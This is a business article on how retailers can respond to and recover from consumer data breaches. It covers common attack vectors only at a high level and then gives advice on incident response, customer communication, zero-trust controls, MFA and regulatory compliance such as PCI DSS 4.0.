How retailers can rebuild trust after a consumer data breach

Retailers have spent decades bolstering their digital posture to keep up with consumer demand for heightened experiences. 

However, these rapid digital transformation initiatives have posed considerable cybersecurity risks for retail enterprises and their customers. In fact, the retail industry has indeed been victim to cybersecurity threats in recent years. 

Some experts suggest that 84% of retail organizations are at risk of cyberattack, making it the third-most targeted industry behind the financial services and healthcare sectors. Also, each incident costs retailers valuable time and money. Companies spend $2.5 million per incident on average and take roughly 197 days to detect breaches.

Despite these shocking statistics, many retail enterprises have struggled to revamp their cyber strategies. Some organizations don’t know where to start. Others may not think the business risk warrants increased investment. But with mounting regulatory scrutiny from agencies like the Federal Trade Commission and equally increasing concern from the public, retailers need to bolster their cybersecurity agendas.

Security gaps and threat vectors

The majority of retail breaches occur because of poor cybersecurity hygiene. It is estimated that basic security hygiene protects against 99% of attacks, according to Microsoft. This includes enabling multi-factor authentication (MFA), implementing zero-trust principles, utilizing detection and response (XDR) and anti-malware technology, and patching and protecting data.

Retailers have inadvertently created gaps across their value chains and channels due to a lack of critical controls. And cyber criminals are well aware of the cracks in retailers’ armor. Over 10% of all attacks in 2023 targeted retailers and wholesalers.

These attacks occur on multiple digital fronts. E-commerce and social commerce platforms are targeted due to known vulnerabilities in their application programming interfaces (APIs) and web applications. When attacking online shoppers, threat actors typically utilize fake websites as well as man-in-the-middle account takeovers and phishing techniques to gain personal information, like credit card details.

Cyberattacks can also occur in physical storefronts, especially with cashier-less kiosks. Hackers will attach skimmers to payment devices to access transaction data. While many attacks target consumers in the hopes of accessing personal data, retailers’ own employees, supply chain vendors, IT providers, and partners may also be victims.

Weak passwords and credentials, single-factor authentication, remote access or support solutions, outdated software, open or misconfigured ports and cloud services, lack of endpoint detection and responses, and unprotected networks are just a few ways threat actors can gain access to networks. And in our interconnected, digitally driven business world — once one company is compromised, then every other company in its partner ecosystem may be at risk too.

Post-breach

Regardless of how an attack occurred, if consumer data becomes compromised, retailers must act quickly. The first step and main priority is to stop the attack, and the best way to terminate a breach is by partnering with a specialized cybersecurity vendor to both assess and secure the network.

Beyond the digitally driven tactics managed by technology teams, retailers also must curtail the fallout in other ways. Communications teams should provide regular and transparent updates to the necessary stakeholders, namely their customers, to restore trust. Legal and compliance teams must report the details of the attack to officials per regulatory guidelines.

Depending on the type and reach of the breach, retailers should establish open lines of communication with vendors and partners. This is especially essential whenever consumer financial information is compromised. In such cases, it may also be necessary to work with payment processors to investigate the attack. Oftentimes, financial institutions disseminate updates and suggest next steps to victims of such cyberattacks. Moving forward, it may benefit retailers to take on this responsibility as well in order to rebuild consumer trust.

Long-term tactics

Even when cyberattacks are finally stopped, the work does not end there. Retailers and their consumers will unfortunately continue to be targeted by threat actors. As any leader who has dealt with a cyberattack knows, just one breach can be costly and wreak reputational havoc. Retail enterprises must spend the time and money to ensure their cybersecurity posture is strengthened and such breaches do not occur again.

Organizations that have experienced a breach should utilize their cyber vendors and refer to their incident reports. Retailers’ internal cyber teams should then run their own security assessment of the entire enterprise environment as attackers often leave backdoors, and then build a roadmap accordingly to avoid being breached again. This will entail establishing new controls and identifying and resolving remaining gaps, such as securing services at the edge.

Another key element of a post-breach roadmap is security technology. Every retailer should strive to attain a zero-trust posture, which can only be achieved with a robust roster of well-integrated technology enabling automatic response and correlated threat information.

Retailers cannot forget to look outside their own environment and consider the risks external parties pose to them — as well as the risks they expose to others. Companies should impose security posture requirements on third-party partnerships, focusing primarily on end-to-
end services. Similarly, retailers should consider enforcing stricter password requirements on customers or better still, MFA.

These tactics aren’t just suggestions. Retailers should expect to endure greater scrutiny from cybersecurity regulators and governing industry bodies. The PCI Security Standards Council has already enacted the latest iteration of their payment card industry data security standard — PCI DSS 4.0.

The SEC, FTC, and numerous states have also bolstered their requirements to protect consumers as cybercrime rates continue to increase. In today’s market, retailers are already exposed to a growing variety of business risks, and retail organizations can do more to mitigate their cyber risks and protect their customers.